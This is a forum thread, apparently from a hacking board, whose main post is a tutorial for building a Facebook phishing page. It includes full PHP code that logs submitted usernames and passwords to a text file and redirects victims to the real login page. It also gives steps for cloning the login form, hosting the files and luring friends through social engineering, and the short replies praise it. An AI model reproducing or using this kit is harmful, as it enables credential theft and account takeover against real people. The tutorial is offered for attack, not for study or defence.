Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 1702

How to Make Facebook Phishing Or Fakeh page

by doomrambo - 02 April, 2020 - 03:09 AM
This post is by a banned member (doomrambo) - Unhide
doomrambo  
Registered
28
Posts
26
Threads
4 Years of service
#1

Just Go here https://www.facebook.com/login.php and right click on anywhere in the webpage and select View Page Source.

Copy all the codes in the page and paste it on note pad or Note pad ++(recommended) and save it like
"Index.Html".

Copy the below
Php code and paste it on another note pad. and name it "Fb.php".

<
?php
header(”Location:
http://www.Facebook.com/login.php “);
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>


And Create a empty new note pad and save it "pass.txt".

Now you having the
Three files

Index.html
Fb.php
Pass.txt


Now we are at the working part, Right click on the Index.html file and open it using note pad or note pad ++. Now press The CTRL + F to perform the search operation. Search the Keyword called action=' also you see "method=post" change it into "method=get".

The keyword followed by the URL look like this.


action="www.facebook.com/login.php"

Now you need to change the URL of existing one. Just replace the existing URL with "fb.php" Which we created earlier.This will look like this after the changes.

action="fb.php"

Thats it you are done half of the part. Now you need any free web hosting accounts to upload these files I refer my3gp.com,110mb or any free hosting account which you trusted and also not banned for a long time. if you prefer the paid hosting means that is more than good.

Sign up into
my3gb.com and Select the file manger and upload these three files to same directory else this won't work.

Copy the Html file link(Index.html) which uploaded and send it to you friends and tell to sign in and see the magic ( Actually you need to show some social engineering there).

then check the empty text file to get the password.

That's it you are done!
                                          [Image: 68747470733a2f2f636f6e74656e742e696e7669...622e676966]
This post is by a banned member (Korn4932) - Unhide
This post is by a banned member (suckmycocksss) - Unhide
11
Posts
0
Threads
4 Years of service
#3
what if there is no action="www.facebook.com/login.php"
This post is by a banned member (Mumuh) - Unhide
Mumuh  
Registered
17
Posts
0
Threads
4 Years of service
#4
Amazing

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 3 Guest(s)